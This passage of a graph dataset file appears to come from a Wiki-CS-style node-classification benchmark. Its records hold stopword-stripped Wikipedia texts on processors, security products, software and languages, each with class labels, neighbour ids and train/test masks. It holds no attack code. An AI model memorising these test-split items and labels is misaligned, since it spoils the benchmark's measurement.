mt/s superior method used intel pentium iii sdr bus speeds 100 mhz 133 mhz amd designed cpu robust x86 instruction decoding capabilities k6 enhance ability keep data in-flight athlon three decoders could potentially decode three x86 instructions six microinstructions per clock although somewhat unlikely real-world use critical branch predictor unit essential keeping pipeline busy enhanced compared board k6 deeper pipelining stages allowed higher clock speeds attained whereas amd k6-iii+ topped 570 mhz due short pipeline even built 180 nm process athlon capable clocking much higher amd ended long-time handicap floating point x87 performance designing super-pipelined out-of-order triple-issue floating point unit three units tailored able calculate optimal type instructions redundancy separate units possible operate one floating point instruction fpu huge step forward amd k6 fpu looked anemic compared intel p6 fpu athlon longer case 3dnow floating point simd technology present received revisions name change enhanced 3dnow additions included dsp instructions implementation extended mmx subset intel sse athlon cpu cache consisted typical two levels athlon first x86 processor 128 kb split level 1 cache 2-way associative cache separated 2×64 kb data instructions concept harvard architecture cache double size k6 already large 2×32 kb cache quadruple size pentium ii iii 2×16 kb l1 cache initial athlon slot later called athlon classic used 512 kb level 2 cache separate cpu processor cartridge board running 50 33 core speed done 250 nm manufacturing process large allow on-die cache maintaining cost-effective die size later athlon cpus afforded greater transistor budgets smaller 180 nm 130 nm process nodes moved on-die l2 cache full cpu clock speed amd athlon processor launched june 23 1999 general availability august '99 launched 500 mhz average 10 faster pentium iii clock business applications even faster ~20 gaming workloads athlon classic cartridge-based processor named slot similar intel cartridge slot 1 used pentium ii pentium iii used commonly available physical 242 pin connector used intel slot 1 processors rotated 180 degrees connect processor motherboard reversal served make slot keyed prevent installation wrong cpu athlon intel processors used fundamentally different incompatible signaling standards front-side bus cartridge assembly allowed use higher speed cache memory modules could put reasonably bundled motherboards time similar pentium ii katmai-based pentium iii athlon classic contained 512 kb l2 cache high-speed sram cache run divisor processor clock accessed via 64-bit bus known back-side bus allowing processor service system front side bus requests rest system cache accesses simultaneously versus traditional approach pushing everything front-side bus one limitation also afflicting intel pentium iii sram cache designs time incapable keeping athlon clock scalability due manufacturing limitations cache chips difficulty routing electrical connections cache chips became increasingly difficult reliably run external processor cache match processor speeds released—and fact became impossible thus initially level 2 cache ran half cpu clock speed 700 mhz 350 mhz cache faster slot-a processors compromise run 2/5 850 mhz 340 mhz cache 1/3 1 ghz 333 mhz cache later race 1 ghz 1000 mhz amd intel exacerbated bottleneck ever higher speed processors demonstrated decreasing gains overall performance—stagnant sram cache memory speeds choked improvements overall speed directly lead development integrating l2 cache onto processor remove dependence external cache chips amd integration cache onto athlon processor would later result athlon thunderbird slot-a athlons first multiplier-locked cpus amd partly done hinder cpu remarking done questionable resellers around globe amd older cpus could simply set run whatever clock speed user chose motherboard making trivial relabel cpu sell faster grade originally intended relabeled cpus always stable overclocked tested properly damaging amd reputation although athlon multiplier locked crafty enthusiasts eventually discovered connector pcb cartridge could control multiplier eventually product called goldfingers device created could unlock cpu named gold connector pads processor board attached commercial terms athlon classic enormous success—not merits also intel endured series major production design quality control issues time particular intel transition 180 nm production process starting late 1999 running mid-2000 suffered delays shortage pentium iii parts contrast amd enjoyed remarkably smooth process transition ample supplies available causing athlon sales become quite strong argon-based athlon contained 22 million transistors measured 184 mm fabricated amd slightly modified version cs44e process 0.25 µm complementary metal–oxide–semiconductor cmos process six levels aluminium interconnect pluto orion athlons fabricated 0.18 µm process second generation athlon thunderbird debuted june 5 2000 version athlon shipped traditional pin-grid array pga format plugged socket socket motherboard also shipped slot package sold speeds ranging 600 mhz 1.4 ghz athlon classics using slot package could clock 1 ghz major difference however cache design intel done replaced old katmai-based pentium iii much faster coppermine-based pentium iii amd replaced 512 kb external reduced-speed cache athlon classic 256 kb on-chip full-speed exclusive cache general rule cache improves performance faster cache improves still amd changed cache design significantly thunderbird core older athlon cpus cpu caching inclusive design data l1 duplicated l2 cache thunderbird moved exclusive design l1 cache contents duplicated l2 increases total cache size processor effectively makes caching behave large l1 cache slower region l2 fast region l1 athlon large l1 cache exclusive design turns l2 cache basically victim cache need high l2 performance size lessened amd kept 64-bit l2 cache data bus older athlons result allowed relatively high latency simpler l2 cache reduced possibility l2 cache causing clock scaling yield issues still instead 2-way associative scheme used older athlons thunderbird move efficient 16-way associative layout thunderbird amd successful product since am386dx-40 ten years earlier mainboard designs improved considerably time initial trickle athlon mainboard makers swollen include every major manufacturer amd new fab dresden came online allowing production increases process technology improved switch copper interconnects october 2000 athlon c introduced raising mainboard front-side bus speed 100 mhz 133 mhz 266 mt/s providing roughly 10 extra performance per clock b model thunderbird amd released third-generation athlon code-named palomino october 9 2001 athlon xp xp suffix interpreted mean extended performance also unofficial reference microsoft windows xp athlon xp marketed using pr system compared relative performance athlon utilizing earlier thunderbird core athlon xp launched speeds 1.33 ghz pr1500+ 1.53 ghz pr1800+ giving amd x86 performance lead 1800+ model less month later enhanced lead release 1600 mhz 1900+ subsequent 1.67 ghz athlon xp 2000+ january 2002 palomino first k7 core include full sse instruction set intel pentium iii well amd 3dnow professional roughly 10 faster thunderbird clock speed thanks part new simd functionality several additional improvements core enhancements k7 tlb architecture added hardware data prefetch mechanism take better advantage available memory bandwidth palomino also first socketed athlon officially supporting dual processing chips certified purpose branded athlon mp according articles posted hardwarezone possible mod athlon xp function mp connecting fuses opga although results varied motherboard used changes core layout also resulted palomino frugal electrical demands consuming approximately 20 less power predecessor thus reducing heat output comparatively well preceding athlon thunderbird capable clock speeds exceeding 1400 mhz power thermal considerations required reach speeds would made increasingly impractical marketable product thus palomino goals lowered power consumption resultant heat produced allowed amd increase performance within reasonable power envelope palomino design also allowed amd continue using 180 nm manufacturing process node core voltages thunderbird palomino core debuted earlier mobile market—branded mobile athlon 4 codename corvette distinctively used ceramic interposer much like thunderbird instead organic pin grid array package used later palomino processors fourth-generation athlon thoroughbred released june 10 2002 1.8 ghz athlon xp pr2200+ thoroughbred core marked amd first production 130 nm silicon resulting significant reduction die size compared 180 nm predecessor came two steppings revisions core commonly referred tbred-a cpuid:6 8 0 tbred-b cpuid:6 8 1 initial version later known simply direct die shrink palomino demonstrated amd successfully transitioned 130 nm process successful reducing production cost per processor unmodified palomino design demonstrate expected reduction heat clock scalability usually seen design shrunk smaller process result amd able increase thoroughbred-a clock speeds much palomino replace tbred-a sold versions 1333 mhz 1800 mhz able displace production-costly palomino amd lineup amd thus reworked thoroughbred design better match process node produced turn creating thoroughbred-b significant aspect redesign addition another ninth metal layer already quite complex eight-layered thoroughbred-a comparison competing pentium 4 northwood utilized six successor prescott seven layers addition layers improve performance gives flexibility chip designers routing electrical pathways within chip importantly thoroughbred core flexibility working around electrical bottlenecks prevented processor attaining higher clock speeds tbred-b offered startling improvement headroom tbred-a made popular overclocking tbred-a often struggled reach clock speeds 1.9 ghz tbred-b often could easily reach 2.3 ghz thoroughbred line received increased front side bus clock lifetime 133 mhz 266 mt/s 166 mhz 333 mt/s improving processor ability access memory i/o efficiency resulted improved per-clock performance amd shifted pr rating scheme accordingly making lower clock speeds equate higher pr ratings thoroughbred-b direct basis successor—the tbred-b additional 256 kb l2 cache 512 kb total became barton core fifth-generation athlon barton -core processors released early 2003 pr 2500+ 2600+ 2800+ 3000+ 3200+ operating higher clock rates thoroughbred -core processors marked higher pr featuring increased 512 kb l2 cache later models additionally supported increased 200 mhz 400 mt/s front side bus thorton core later variant barton half l2 cache disabled thus functionally identical thoroughbred-b core name thorton portmanteau thoroughbred barton time barton release northwood -based pentium 4 become competitive amd processors unfortunately amd simple increase size l2 cache 512 kb nearly impact intel pentium 4 line athlon architecture nearly cache-constrained pentium 4 athlon exclusive-cache architecture shorter pipeline made less sensitive l2 cache size barton saw increase several percent gained per-clock performance thoroughbred-b derived increased performance welcome sufficient overtake pentium 4 line overall performance pr also became somewhat inaccurate barton models lower clock rates given higher pr higher-clocked thoroughbred processors instances computational task benefit additional cache make loss raw clock speed created situations lower rated faster clocked thoroughbred would outperform higher-rated lower clocked barton barton also used officially introduce higher 400 mt/s bus clock socket platform used gain barton models efficiency increased pr however clear time intel quad-pumped bus scaling well amd double-pumped ev6 bus 800 mt/s bus used many later pentium 4 processors well athlon xp reach order reach bandwidth levels athlon xp bus would clocked levels simply unreachable point four-year-old athlon ev6 bus architecture scaled limit maintain exceed performance intel newer processors would require significant redesign k7 derived athlons replaced september 2003 athlon 64 family featured on-chip memory controller completely new hypertransport bus replace ev6 barton 130 nm thorton 130 nm mobile athlon xps athlon xp-m using given core physically identical equivalent desktop athlon xps counterpart differing configuration used achieve given performance level processors usually binned selected become mobile processor ability run given processor speed supplied lower desktop voltage results lower power consumption longer battery life reduced heat using normal desktop part additionally mobile xps feature multiplier-locked generally higher-rated maximum operating temperatures requirements intended better operation within tight thermal constraints within notebook pc—but also making attractive overclocking athlon xp-m replaced older mobile athlon 4 based palomino core athlon xp-m using newer thoroughbred barton cores athlon xp-m also offered compact micropga socket 563 version space constrained applications alternative larger socket like mobile k6-2+/iii+ predecessors cpus capable dynamic clock adjustment power optimization also reason unlocked multiplier system idle cpu clocks via lower bus multiplier selects lower voltage program demands computational resources cpu quickly latency returns intermediate maximum speed appropriate voltage meet demand technology marketed powernow similar intel speedstep power saving technique feature controlled cpu motherboard bios operating system amd later renamed technology cool n'quiet k8-based cpus athlon 64 etc introduced use desktop pcs well athlon xp-ms popular desktop overclockers well underclockers lower voltage requirement higher heat rating selected cpus essentially cherry picked manufacturing line best cores line cpus typically overclocked reliably desktop-headed counterparts also fact locked single multiplier significant simplification overclocking process barton core athlon xp-ms successfully overclocked high 3.1 ghz chips also liked undervolting ability undervolting process determining lowest voltage cpu remain stable given clock speed athlon xp-m cpus already rated running lower voltages desktop siblings better starting point lowering voltage even popular application use home theater pc systems due high performance low heat output resultant low vcore settings besides multiplier locked xp-ms curiously disabled multi processor operation thus could used place expensive athlon mp dual socket motherboards since boards generally lacked multiplier voltage adjustment normally supported 133 mhz fsb adjustments would still needed full speed operation one method modification known wire-modding involves connecting appropriate cpu pins cpu socket small lengths wire select appropriate multiplier typical overclock mobile 2500+ cpu 2.26 ghz 17x multiplier would result faster highest official 2800+ mp cpu running 2.13 ghz fastest supercomputers based athlonmp",
    "neighbors": [
      3586,
      3459,
      3588,
      5380,
      8322,
      6151,
      8327,
      9092,
      10375,
      5645,
      3470,
      6926,
      528,
      10260,
      7963,
      1053,
      2719,
      7712,
      5541,
      11047,
      2094,
      7983,
      3892,
      1461,
      8125,
      8126,
      6463,
      7744,
      6978,
      7234,
      3142,
      3911,
      11080,
      8523,
      2764,
      5326,
      7247,
      5329,
      9044,
      725,
      3798,
      9964,
      473,
      3547,
      5606,
      7657,
      10601,
      1515,
      1260,
      1005,
      4334,
      5356,
      1776,
      1137,
      5358,
      499,
      1651,
      2549,
      630,
      3317,
      7151,
      10734,
      1915,
      3070
    ],
    "mask": "Test"
  },
  {
    "node_id": 1006,
    "label": 4,
    "text": "Cisco_Security_Agent:cisco security agent cisco security agent csa endpoint intrusion prevention system made originally okena formerly named stormwatch agent bought cisco systems 2003 software rule-based examines system activity network traffic determining behaviors normal may indicate attack csa offered replacement cisco ids host sensor announced end-of-life 21 february 2003 end life action result cisco acquisition okena inc. cisco security agent product line based okena technology would replace cisco ids host sensor product line entercept result end-of-life action cisco offered no-cost one-for-one product replacement/migration program cisco ids host sensor customers new cisco security agent product line intent program support existing ids host sensor customers choose migrate new cisco security agent product line cisco ids host sensor customers eligible migration program whether customer purchased cisco software application support sas service contract cisco ids host sensor products csa uses two three-tier client-server architecture management center 'mc management console contains program logic ms sql database backend used store alerts configuration information mc sql database may co-resident system agent installed desktops and/or servers protected agent communicates management center sending logged events management center receiving updates rules occur network world article dated 17 december 2009 stated cisco hinted end-of-life csa mars full article linked 11 june 2010 cisco announced end-of-life end-of-sale csa cisco offer replacement product",
    "neighbors": [
      5612,
      7983,
      6834,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1007,
    "label": 6,
    "text": "Midnight_Commander:midnight commander gnu midnight commander also known codice_1 command used start mouseless commander older versions free cross-platform orthodox file manager started miguel de icaza 1994 clone then-popular norton commander gnu midnight commander part gnu project licensed terms gnu general public license midnight commander console application text user interface main interface consists two panels display file system file selection done using arrow keys insert key used select files function keys perform operations renaming editing copying files later versions midnight commander additionally mouse support versions aware gpm x terminal emulators gnome terminal xterm support mouse reporting running inside x terminal versions update name window midnight commander runs allowed terminal emulator midnight commander features include ability view contents rpm package files work common archive formats simply another directory function ftp fish client midnight commander also includes editor called mcedit executed standalone program midnight commander using f4 key mcedit features include syntax highlighting many languages macros code snippets simple integration external tools automatic indentation mouse support clipboard ability work ascii hex modes users also option replace mcedit editor choice options menu configuration n't use internal edit midnight commander also rename groups files unlike number file managers rename one file time convenient manipulating large collections files e.g make conform new naming convention midnight commander also move files different directory time renames lets user specify original resulting file names using wildcard characters makes power regular expressions available renaming files convenient user interface addition user select whether use shell patterns globs automatic grouping wildcards features available using file rename/move menu selection pressing f1 would produce brief explanation options including examples use wildcards midnight commander based versatile text interfaces ncurses s-lang allow work regular console inside x terminal ssh connections rs-232 interface embedded devices kinds remote shells native support utf-8 locales unicode added 2009 development versions midnight commander version 4.7.0 mc unicode support",
    "neighbors": [
      2050,
      2180,
      11654,
      4493,
      6797,
      1939,
      5397,
      8857,
      7450,
      7325,
      802,
      3618,
      7849,
      11562,
      7983,
      7986,
      5555,
      9148,
      5694,
      10687,
      576,
      7364,
      10822,
      5703,
      5833,
      8147,
      11221,
      3674,
      2010,
      10464,
      5096,
      9579,
      5612,
      8304,
      1394,
      5619,
      8436
    ],
    "mask": "None"
  },
  {
    "node_id": 1008,
    "label": 7,
    "text": "FreshBooks:freshbooks freshbooks accounting software package developed marketed 2ndsite inc. freshbooks products geared mainly toward small medium-sized businesses offer cloud-based accounting applications send invoices clients bill time expertise company founded 2003 based toronto ontario canada company founded 2003 mike mcderment joe sawada mcderment previous internet marketing consulting business anicon company traces origins mcderment inadvertently losing invoice record overwriting 2003 sought new way manage accounting business product first eponymously named 2ndsite synonymous company company rebranded product 2006 freshbooks based toronto ontario canada freshbooks customers 160 countries july 23 2014 company announced raised 30 million usd first round institutional venture capital 2016 company unveiling new interface improved functionality load times app freshbooks offers subscription-based product includes invoicing accounts payable expense tracking time tracking retainers fixed asset depreciation purchase orders payroll integrations double-entry accounting industry-standard business management reporting financial data stored cloud single unified ledger allowing users access set books regardless location desktop mobile offers free api enables customers 3rd-party software vendors integrate external applications freshbooks freshbooks also supports multiple tax rates currencies also incorporates payroll feature projects feature freshbooks headquarters toronto canada operations north america europe australia founder mike mcderment chief executive officer company since inception 2003 2014 freshbooks raised series venture investment 30 million led venture capital firm oak investment partners participation georgian partners atlas venture 2017 company announced raised another 43 million funding accomplice georgian partners oak investment partners",
    "neighbors": [
      7489,
      1539,
      5224,
      11113,
      7532,
      10509,
      1680,
      467,
      8307,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 1009,
    "label": 4,
    "text": "Internet_Junkbuster:internet junkbuster internet junkbuster web proxy block ads cookies developed junkbusters corporation released gnu general public license however internet junkbuster updated since 1998 junkbusters.com web site longer maintained privoxy up-to-date filtering proxy based junkbuster code much powerful see also proxomitron windows-based web filter update dated november 2012 sorry junkbusters.com web site longer maintained says website article contains material infoanarchy",
    "neighbors": [
      7965,
      4725
    ],
    "mask": "Test"
  },
  {
    "node_id": 1010,
    "label": 4,
    "text": "ISO_15292:iso 15292 iso 15292 information technology – security techniques – protection profile registration procedures establishes international registry operated afnor protection profiles packages used computer security evaluation common criteria framework format profiles packages specified iso 15408 iso 15292 assigns registered protection profiles packages labels form entry type-registration year-registration number example pp-2003-0001",
    "neighbors": [
      10752,
      8854,
      11036,
      5149,
      2206,
      9245,
      5413,
      10413,
      11056,
      8627,
      3126,
      1079,
      5816,
      6593,
      6977,
      8904,
      1610,
      9290,
      8524,
      2519,
      2904,
      4058,
      4064,
      8421,
      8426,
      5614,
      3447,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 1011,
    "label": 2,
    "text": "Matías_Duarte:matías duarte matías duarte born 7 december 1973 chilean computer interface designer google vice president design prior current role director android user experience android 3.0 honeycomb first release major elements design influence prior moving google work android duarte similar roles palm ’ webos helio ocean danger hiptop t-mobile sidekick duarte started career psycroft cowrote xbill brian wellington left psycroft 1996 time moved hyper image productions lead designer phase zero unreleased shooter game atari jaguar 1997 left hyper image productions moved magicarts filled role vice president design 1999 march 2000 duarte took role danger director design team 2002 wired 'industrial designer rave award work designing hiptop/sidekick august 2005 took role helio vice president experience design left shortly company acquired virgin mobile september 2007 duarte hired vice president palm inc. lead development palm ’ webos human interface user experience introduced design webos 2009 consumer electronics show may 2010 duarte hired google director android user experience working interface design android 3.0 aka honeycomb duarte earned bachelor science honors university maryland b.s computer science took additional concentrations study fine art art history managed student art gallery 1993 1996 university maryland duarte daughter june 2008",
    "neighbors": [
      2978,
      7595,
      3409,
      921,
      4479
    ],
    "mask": "None"
  },
  {
    "node_id": 1012,
    "label": 4,
    "text": "Woo–Lam:woo–lam cryptography woo–lam refers various computer network authentication protocols designed simon s. lam thomas woo protocols enable two communicating parties authenticate identity exchange session keys involve use trusted key distribution center kdc negotiate parties symmetric-key public-key variants described however protocols suffer various security flaws part described inefficient compared alternative authentication protocols following notation used describe algorithm assumed parties know kdc public key original version protocol identifier formula_23 omitted lines 5 6 account fact formula_24 unique among nonces generated parties protocol revised authors spotted flaw algorithm",
    "neighbors": [
      7,
      4242,
      3477,
      2080,
      2083,
      9635,
      2087,
      4663,
      8760,
      5433,
      5568,
      10058,
      6098,
      8670,
      6750,
      2143,
      2274,
      8674,
      6888
    ],
    "mask": "Train"
  },
  {
    "node_id": 1013,
    "label": 4,
    "text": "Protection_mechanism:protection mechanism computer science protection mechanisms built computer architecture support enforcement security policies simple definition security policy set may use information computer system access matrix model first introduced 1971 generalized description operating system protection mechanisms separation protection security special case separation mechanism policy",
    "neighbors": [
      8259,
      4583,
      9677,
      7983,
      6162,
      10556,
      11262
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1014,
    "label": 3,
    "text": "Kryo:kryo qualcomm kryo brand name series custom semi-custom arm-based cpus cpus implement armv8-a 64-bit instruction set serve successor older 32-bit krait core first announced september 2015 used snapdragon 820 soc kryo cores used parts big.little configuration two dual-core clusters case snapdragon 820 821 run different clock frequency similar cortex-a53 clusters work snapdragon 615 kryo 820/821 in-house custom armv8.0-a aarch64/aarch632 design based arm cortex design kryo 2xx series cpus derivative original kryo microarchitecture rather semi-custom design licensed arm ’ built arm cortex technology boc license kryo 2xx series cpus derivative arm cortex-a73 performance/gold cluster cortex-a53 efficiency/silver cluster big.little arrangement kryo 280 cpu announced along snapdragon 835 mobile platform november 2016 compared original kryo new kryo 280 core improved integer instructions per clock lower floating point instructions per clock however overall 835 praised reviewers offering significant performance efficiency advantage compared 820 exynos 8895 largely due improvements cpu scheduling dvfs systems kryo 260 cpu announced along snapdragon 660 mobile platform mid-range smartphone may 2017 kryo 260 cores also used snapdragon 636 snapdragon 665 kryo 250 cpu introduced snapdragon 632 mobile platform announced june 2018 also built 14 nm process similar kryo 260 differences size l2 cache qualcomm claims increased performance 40 compared snapdragon 625 uses cortex-a53 cores kryo 3xx series cpus features semi-custom gold silver cores derivative arm cortex-a75 cortex-a55 respectively arranged configurations dynamiq qualcomm first cpus support armv8.2-a dynamiq dynamiq allows flexibility cpu configuratoin including amounts cores/cache cpu clusters kryo 385 core announced part snapdragon 845 december 2017 qualcomm expected 25–30 increased performance task run high-performance cores 15 increase efficiency cores relative snapdragon 835 testing found significant advantages performance efficiency compared exynos 8895 9810 kryo 385 also used snapdragon 850 kryo 360 qualcomm upper mid-range semi-custom core introduced snapdragon 710 announced may 2018 kryo 360 also used snapdragon 670 712 kryo 4xx series cpus features semi-custom gold prime/gold silver cores derivative arm cortex-a76 cortex-a55 respectively arranged configurations dynamiq qualcomm reveal semi-custom cortex-a76 larger out-of-order execution window reorder buffer data prefetchers optimised floating point workloads kryo 495 cpu announced snapdragon 8cx 6 december 2018 qualcomm claims 8cx 60 efficient snapdragon 850 kryo 485 cpu announced snapdragon 855 5 december 2018 qualcomm claim 45 increase performance compared 845 kryo 385 testing found 855 outperformed 845 51 specint2006 61 specfp2006 39 power efficiency 855 also significantly efficient exynos 9820 kryo 470 cpu qualcomm upper mid-range semi-custom core introduced april 2019 snapdragon 730 730g kryo 460 cpu qualcomm mid-range semi-custom core introduced october 2018 snapdragon 675",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      5417,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 1015,
    "label": 4,
    "text": "Sandvine:sandvine sandvine incorporated networking equipment company based fremont california united states sandvine network policy control products designed implement broad network policies ranging censorship service creation billing congestion management security sandvine targets products consumer tier 1 tier 2 networks including cable dsl mobile sandvine formed august 2001 waterloo ontario canada team approximately 30 people recently closed cisco acquisition pixstream initial round vc funding launched company 20 million cdn subsequent round financing 19 million cdn completed may 2005 march 2006 sandvine completed initial public offering london aim exchange ticker 'sand october 2006 sandvine completed initial public offering toronto stock exchange ticker 'svc initial product sales focused congestion management operators struggled high growth broadband many operators shifted focus revenue generating services reducing operational expenditure june 2007 sandvine acquired cablematrix technologies packetcable multimedia pcmm -based pcrf enable broadband operators increase subscriber satisfaction delivering media-rich ip applications services sip telephony video streaming on-line gaming videoconferencing august 2015 sandvine acquired momac b.v. customer engagement technologies subscribers presented relevant message offer alert right time screen take immediate action february 2016 sandvine acquired assets teclo networks ag tcp optimization technology july 2017 sandvine shareholders accepted 562 million cdn takeover bid pni acquireco corp. affiliate francisco partners procera networks acquisition completed september 2017 sandvine shares ceased listed toronto stock exchange acquisition completed despite concerns raised ronald deibert director citizen lab munk school global affairs university toronto argued takeover required “ closer scrutiny ” federal government largely light activities done two francisco ’ portfolio companies notably procera networks part controversy technology alleged used spy turkish citizens march 2018 citizen lab published report showing strong evidence packetlogic devices sandvine could used deploy government spyware turkey redirect egyptian users affiliate ads citizen lab performed number tests contrasting behaviour network data traffic countries packetlogic device procured independently sandvine technology focuses policy management including control spam usage-based billing quality service p2p throttling use freebsd basis appliances rather identifying individual messages spam control based identifying sources spam behaviors using multiple smtp servers using multiple source ehlo domains large address books quality service control provided range media applications including video conferencing voip gaming p2p throttling focuses gnutella uses path cost algorithm reduce speeds still delivering content stateful policy management uses stateful deep-packet inspection packet spoofing allow networking device determine details p2p conversation including hash requested device determine optimal peer use substitute one selected p2p algorithm sitting middle imitating ends connection sending reset packets client server usage-based-billing includes pre-paid post-paid 3g 4g mobile access well fixed access according research citizen lab products sold sandvine used facilitate censorship internet egypt allegation company denies sandvine products used comcast united states limit number sessions internet traffic generated peer-to-peer file sharing software sandvine current traffic discrimination product fairshare described detail rfc according independent testing comcast injected reset packets peer-to-peer connections effectively caused certain limited number outbound connections immediately terminate method network management described ieee communications may 2000 article nonintrusive tcp connection admission control bandwidth management internet access link product whitepaper published sandvine confirms products configurable use session management capability prevent customers using bittorrent providing uploads peers close network affects uses bittorrent open-source project distribution patch distribution illegal downloads",
    "neighbors": [
      4229,
      998,
      8172,
      10417,
      8696
    ],
    "mask": "None"
  },
  {
    "node_id": 1016,
    "label": 9,
    "text": "Comparison_of_programming_languages_(strings):comparison programming languages strings comparison programming languages strings compares features string data structures text-string processing 52 various computer programming languages different languages use different symbols concatenation operator many languages use symbol though several deviate section compares styles declaring string literal expression interpolated string compiler/interpreter evaluates inserts result place escaped quotes means 'flag symbol used warn character flag used string rather ending string dual quoting means whenever quote used string used twice one discarded single quote used within string raw means compiler treats every character within literal exactly written without processing escapes interpolations many languages syntax specifically intended strings multiple lines languages syntax document heredoc token representing string put middle line code code continues starting token string content n't appear next line languages string content starts immediately starting token code continues string literal terminator",
    "neighbors": [
      5760,
      3462,
      8582,
      1931,
      2062,
      6414,
      6160,
      5521,
      10510,
      3736,
      1435,
      155,
      7326,
      11555,
      3876,
      5796,
      428,
      5677,
      5806,
      10413,
      9008,
      3762,
      11442,
      3765,
      8502,
      7479,
      10043,
      10684,
      6718,
      963,
      8644,
      8262,
      11132,
      5961,
      1610,
      1611,
      9804,
      3577,
      8397,
      847,
      11212,
      7889,
      11219,
      5588,
      7894,
      2519,
      4057,
      10586,
      11610,
      4069,
      10470,
      4840,
      7274,
      8554,
      6640,
      3960,
      3705,
      7292,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1017,
    "label": 4,
    "text": "Evasion_(network_security):evasion network security network security evasion bypassing information security device order deliver exploit attack form malware target network system without detection evasions typically used counter network-based intrusion detection prevention systems ips ids also used by-pass firewalls defeat malware analysis target evasions crash network security device rendering in-effective subsequent targeted attacks evasions particularly nasty well-planned implemented evasion enable full sessions carried forth packets evade ids attacks carried sessions happen right nose network service administrators security systems rendered ineffective well-designed evasion techniques way stealth fighter attack without detection radar defensive systems good analogy evasions system designed recognize keywords speech patterns phone system “ break system x ” simple evasion would use language english parties still understand wishfully language people possible talk various advanced targeted evasion attacks known since mid-1990s 1997 article mostly discusses various shell-scripting character-based tricks fool ids phrack magazine article technical report ptacek et al discusses tcp/ip protocol exploits evasions others recent discussions evasions include report kevin timm challenge protecting servers evasions model end-host operation network security device i.e. device able know target host would interpret traffic would harmful key solution protecting evasions traffic normalization ids/ips device lately discussions putting effort research evasion techniques presentation hack.lu discussed potentially new evasion techniques apply multiple evasion techniques by-pass network security devices singh abhishek evasions intrusion prevention detection systems virus bulletin retrieved 1 april 2010",
    "neighbors": [
      7491,
      7560,
      3473,
      1429,
      7578,
      7515,
      2430
    ],
    "mask": "None"
  },
  {
    "node_id": 1018,
    "label": 3,
    "text": "Apache_Heron:apache heron apache heron distributed stream processing engine developed twitter according creators twitter scale diversity twitter data increased heron real-time analytics platform process streaming introduced sigmod 2015",
    "neighbors": [
      10377,
      7567,
      1296,
      1047,
      1913,
      8217,
      6555,
      8860,
      11161,
      3877,
      10661,
      11303,
      5677,
      7983,
      4919,
      5047,
      4538,
      1851,
      7485,
      7742,
      9789,
      7233,
      6338,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      7159,
      3705,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 1019,
    "label": 9,
    "text": "Agda_(programming_language):agda programming language agda dependently typed functional programming language originally developed ulf norell chalmers university technology implementation described phd thesis original agda system developed chalmers catarina coquand 1999 current version originally known agda 2 full rewrite considered new language shares name tradition agda also proof assistant based propositions-as-types paradigm unlike coq support tactics proofs written functional programming style language ordinary programming constructs data types pattern matching records let expressions modules haskell-like syntax system emacs atom interfaces also run batch mode command line agda based zhaohui luo unified theory dependent types utt type theory similar martin-löf type theory main way defining data types agda via inductive data types similar algebraic data types non-dependently typed programming languages definition peano numbers agda basically means two ways construct value type ℕ representing natural number begin codice_1 natural number codice_2 natural number codice_3 standing successor codice_2 natural number definition less equal relation two natural numbers first constructor codice_5 corresponds axiom zero less equal natural number second constructor codice_6 corresponds inference rule allowing turn proof codice_7 proof codice_8 value codice_9 proof one successor zero less equal two successor one parameters provided curly brackets may omitted inferred core type theory induction recursion principles used prove theorems inductive types agda dependently typed pattern matching used instead example natural number addition defined like way writing recursive functions/inductive proofs natural applying raw induction principles agda dependently typed pattern matching primitive language core language lacks induction/recursion principles pattern matching translates one distinctive features agda compared similar systems coq heavy reliance metavariables program construction example one write functions like agda codice_10 metavariable interacting system emacs mode show user expected type allow refine metavariable i.e. replace detailed code feature allows incremental program construction way similar tactics-based proof assistants coq programming pure type theory involves lot tedious repetitive proofs agda support tactics instead agda support automation via reflection reflection mechanism allows one quote program fragments – unquote – abstract syntax tree way reflection used similar way template haskell works another mechanism proof automation proof search action emacs mode enumerates possible proof terms limited 5 seconds one terms fits specification put meta variable action invoked action accepts hints e.g. theorems modules used whether action use pattern matching etc agda total language i.e. program must terminate possible patterns must matched without feature logic behind language becomes inconsistent becomes possible prove arbitrary statements termination checking agda uses approach foetus termination checker agda extensive de facto standard library includes many useful definitions theorems basic data structures natural numbers lists vectors library beta active development one notable features agda heavy reliance unicode program source code standard emacs mode uses shortcuts input codice_11 σ two compiler backends malonzo haskell one javascript",
    "neighbors": [
      9345,
      10145,
      3876,
      5796,
      3462,
      9320,
      11641,
      12,
      5612,
      7983,
      11026,
      11028,
      3926,
      4791,
      2585,
      8924,
      8926,
      6239
    ],
    "mask": "Test"
  },
  {
    "node_id": 1020,
    "label": 4,
    "text": "Dancing_pigs:dancing pigs computer security dancing pigs term problem describes computer users attitudes computer security states users continue pick amusing graphic even receive warning security software potentially dangerous words users choose primary desire features without considering security dancing pigs generally used tech experts found articles term origin remark edward felten bruce schneier states bruce schneier expands remark follows mozilla security reviewers guide states widely publicized 2009 paper directly addresses dancing pigs quotation argues users behavior plausibly rational one study phishing found people really prefer dancing animals security study showed participants number phishing sites including one copied bank west home page schneier believes dancing pigs problem lead crime key threat said tactics might change ... security measures make tactics harder others easier underlying issue constant ignoring computer security inflict various types damage resulting significant losses",
    "neighbors": [
      1315,
      10756,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1021,
